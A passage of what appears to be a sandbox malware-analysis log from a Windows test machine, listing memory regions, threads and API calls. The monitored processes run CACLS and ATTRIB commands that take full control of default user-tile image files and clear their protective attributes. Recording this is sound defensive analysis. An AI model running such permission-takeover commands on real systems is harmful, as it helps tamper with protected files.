region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27441 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27442 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27443 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 27444 start_va = 0xad0000 end_va = 0xad8fff entry_point = 0xad0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27445 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27446 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27447 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27448 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 27449 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27450 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27451 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 
27452 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27453 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27454 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 27455 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27456 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27457 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27458 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27459 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27460 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27461 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 579 os_tid = 0x8a0 Thread: id = 580 os_tid = 0x6dc Process: id = "408" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0x8cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "406" os_parent_pid = "0x9c8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27462 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27463 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27464 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27465 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 27466 start_va = 0xfe0000 end_va = 0xfe6fff entry_point = 0xfe0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27467 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 27468 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27469 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27470 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27471 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27472 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27473 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27474 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27475 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 27476 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 27477 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27478 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 27479 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27480 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27481 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27482 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27483 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27484 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27485 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27486 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27487 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename 
= "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27488 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27489 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 27490 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27491 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 581 os_tid = 0x83c Process: id = "409" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x114" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27492 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 27493 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27494 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27495 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27496 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27497 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27498 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27499 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27500 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 27501 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27502 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27503 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27504 start_va = 0x50000 end_va 
= 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27505 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 27506 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 27507 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27508 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27509 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27510 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27511 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27512 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27513 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = 
"\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27514 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27515 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27516 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27517 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27518 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27519 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 27520 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 27521 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 27522 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 27523 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 27524 start_va = 0x500000 end_va = 0x662fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 
27525 start_va = 0x6e0000 end_va = 0x12dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 27526 start_va = 0x12e0000 end_va = 0x15aefff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 582 os_tid = 0x748 [0189.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efe64 | out: lpSystemTimeAsFileTime=0x2efe64*(dwLowDateTime=0xa5a30ce0, dwHighDateTime=0x1d440a9)) [0189.134] GetCurrentProcessId () returned 0x114 [0189.134] GetCurrentThreadId () returned 0x748 [0189.134] GetTickCount () returned 0x35ec2 [0189.134] QueryPerformanceCounter (in: lpPerformanceCount=0x2efe5c | out: lpPerformanceCount=0x2efe5c*=24592349408) returned 1 [0189.135] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0189.135] __set_app_type (_Type=0x1) [0189.135] __p__fmode () returned 0x76b331f4 [0189.135] __p__commode () returned 0x76b331fc [0189.135] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0189.135] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0189.135] GetCurrentThreadId () returned 0x748 [0189.135] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x748) returned 0x38 [0189.136] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.136] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0189.136] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.136] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0189.136] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, 
samDesired=0x20019, phkResult=0x2efdf4 | out: phkResult=0x2efdf4*=0x0) returned 0x2 [0189.136] VirtualQuery (in: lpAddress=0x2efe2b, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.136] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0189.136] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0189.136] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.136] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efdc4, dwLength=0x1c | out: lpBuffer=0x2efdc4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0189.136] GetConsoleOutputCP () returned 0x1b5 [0189.136] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.136] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0189.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.136] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0189.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.137] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.137] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.137] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 
[0189.137] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.137] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.137] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.137] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0189.137] GetEnvironmentStringsW () returned 0x410308* [0189.137] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0189.137] GetEnvironmentStringsW () returned 0x410308* [0189.137] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0189.138] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed64 | out: phkResult=0x2eed64*=0x40) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0xb8, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x1, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x1, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x0, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x40, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, 
lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x40, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x40, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegCloseKey (hKey=0x40) returned 0x0 [0189.138] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eed64 | out: phkResult=0x2eed64*=0x40) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x40, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x1, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x1, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x0, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x9, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eed6c, 
lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x4, lpData=0x2eed70*=0x9, lpcbData=0x2eed68*=0x4) returned 0x0 [0189.138] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eed6c, lpData=0x2eed70, lpcbData=0x2eed68*=0x1000 | out: lpType=0x2eed6c*=0x0, lpData=0x2eed70*=0x9, lpcbData=0x2eed68*=0x1000) returned 0x2 [0189.138] RegCloseKey (hKey=0x40) returned 0x0 [0189.138] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886397 [0189.138] srand (_Seed=0x5b886397) [0189.138] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"" [0189.138] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp\"" [0189.138] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.139] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0189.139] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.139] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0189.139] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") 
